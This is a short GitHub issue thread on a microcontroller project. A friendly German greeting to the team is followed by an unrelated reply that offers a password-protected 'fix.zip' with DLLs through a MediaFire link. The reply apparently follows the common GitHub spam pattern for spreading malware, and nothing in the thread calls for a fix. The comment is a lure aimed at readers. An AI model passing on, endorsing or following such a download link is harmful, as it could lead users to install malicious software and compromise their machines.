### ISSUE TITLE
Nice

### ISSUE THREAD

**Issue by Friedjof** [Just-another-Muensterhack/cornern-microcontroller#1]
Da bin ich einmal nicht dabei und dann macht ihr etwas mit Sensoren und Hardware :D
Aber viel Spaß euch noch. Ich drücke euch die Daumen! ^^

**Comment by SagarChandra07** [comment]
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
I put the necessary dlls in the archive
